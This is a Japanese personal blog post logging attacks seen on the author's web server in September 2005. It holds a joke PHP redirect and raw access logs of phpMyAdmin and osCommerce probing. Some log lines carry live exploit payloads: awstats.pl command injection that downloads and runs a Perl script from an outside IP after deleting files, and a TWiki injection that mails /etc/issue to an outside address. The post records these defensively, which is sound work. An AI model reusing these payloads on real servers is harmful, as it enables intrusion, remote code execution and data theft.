不正アクセス一覧（2005-09）

2005年9月5日

相変わらず cave2.cavenet.com からのアクセスは続く。面倒くさいので、"301 Moved"で追い返す設定をした。.htaccess+RewriteRuleで次のphpにとばすようにした。301 Moved を受けて、移転先に指定したアドレスを読み直しに行く様なことはしないのだろうけれど、洒落である。

<?php
header("HTTP/1.0 301 Moved Permanently");
header('Location: http://'.$_SERVER['REMOTE_ADDR'].$_SERVER['REQUEST_URI']);
?><html><body>HTTP/1.0 301 Moved Permanently</body></html>

207.14.166.253
"GET /phpmyadmin/main.php HTTP/1.0" 404 279 "-" "pmafind"
"GET /PMA/main.php HTTP/1.0" 404 272 "-" "pmafind"
"GET /mysql/main.php HTTP/1.0" 404 274 "-" "pmafind"
"GET /admin/main.php HTTP/1.0" 404 274 "-" "pmafind"
"GET /db/main.php HTTP/1.0" 404 271 "-" "pmafind"
"GET /dbadmin/main.php HTTP/1.0" 404 276 "-" "pmafind"
"GET /web/phpMyAdmin/main.php HTTP/1.0" 404 283 "-" "pmafind"
"GET /admin/pma/main.php HTTP/1.0" 404 278 "-" "pmafind"
"GET /admin/phpmyadmin/main.php HTTP/1.0" 404 285 "-" "pmafind"
"GET /admin/mysql/main.php HTTP/1.0" 404 280 "-" "pmafind"
"GET /mysql-admin/main.php HTTP/1.0" 404 280 "-" "pmafind"
"GET /phpmyadmin2/main.php HTTP/1.0" 404 280 "-" "pmafind"
"GET /mysqladmin/main.php HTTP/1.0" 404 279 "-" "pmafind"
"GET /mysql-admin/main.php HTTP/1.0" 404 280 "-" "pmafind"
"GET /main.php HTTP/1.0" 404 268 "-" "pmafind"
"GET /phpMyAdmin-2.5.6/main.php HTTP/1.0" 404 285 "-" "pmafind"
"GET /phpMyAdmin-2.5.4/main.php HTTP/1.0" 404 285 "-" "pmafind"
"GET /phpMyAdmin-2.5.1/main.php HTTP/1.0" 404 285 "-" "pmafind"

210.111.138.120, 216.94.41.105
"GET /oscommerce/admin/file_manager.php HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /osc/admin/file_manager.php HTTP/1.1" 404 286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /osCommerce/catalog/admin/file_manager.php HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /catalog/admin/file_manager.php HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /admin/file_manager.php HTTP/1.1" 404 282 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /store/admin/file_manager.php HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /onlineshop/admin/file_manager.php HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /shop/admin/file_manager.php HTTP/1.1" 404 287 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

69.84.133.37 170.94.47.8 141.20.116.9 165.21.82.242 209.178.222.236 139.124.196.5 66.235.201.110
"GET /phpmyadmin/index.php HTTP/1.0" 404 289 "-" "-"

195.56.182.136
"GET /phpmyadmin/deadhat.php HTTP/1.0"

67.69.142.66
"GET /phpmyadmin/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /PMA/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /mysql/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /admin/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /db/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /dbadmin/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /web/phpMyAdmin/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /admin/pma/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /admin/phpmyadmin/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /admin/mysql/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /mysql-admin/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /phpmyadmin2/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /mysqladmin/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /mysql-admin/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /phpMyAdmin-2.5.6/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /phpMyAdmin-2.5.4/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /phpMyAdmin-2.5.1/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /phpMyAdmin-2.2.3/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /phpMyAdmin-2.2.6/main.php HTTP/1.1" 301 57 "-" "PMAFind"
"GET /myadmin/main.php HTTP/1.1" 404 276 "-" "PMAFind"

213.61.245.254
"GET /phpmyadmin/main.php HTTP/1.0" 301 57 "-" "-"

82.90.174.226
"GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 404 271 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 404 278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 404 278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 404 274 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /awstats.pl/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 404 281 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 404 276 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

200.41.4.4
"GET //cgi-bin/awstats/awstats.pl HTTP/1.1" 301 57 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET //cgi-bin/awstats.pl HTTP/1.1" 301 57 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET //cgi/awstats.pl HTTP/1.1" 301 57 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET //awstats/awstats.pl HTTP/1.1" 301 57 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET //cgi-bin/stats/awstats.pl HTTP/1.1" 301 57 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET //stats/awstats.pl HTTP/1.1" 301 57 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET //awstats.pl HTTP/1.1" 301 57 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET //cgi/stats/awstats.pl HTTP/1.1" 301 57 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

202.51.167.165
"GET http://222.240.146.34:804/proxy.cgi HTTP/1.1" 404 272 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)"

209.145.65.165
"GET /cgi-bin/view/Main/TWikiUsers?rev=2%20%7Ccat%20/etc/issue%20|%20mail%20-s%20c%20test1@7cities.net%00 HTTP/1.1" 301 57 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"GET /twiki/bin/view/Main/TWikiUsers?rev=2%20%7Ccat%20/etc/issue%20|%20mail%20-s%20t%20test1@7cities.net%00 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

コメントはありません

Jeans & Development コンピューターのことなどを綴ったメモ (旧：目から鱗 w/SQLite)

不正アクセス一覧（2005-09）

コメント

コメント送信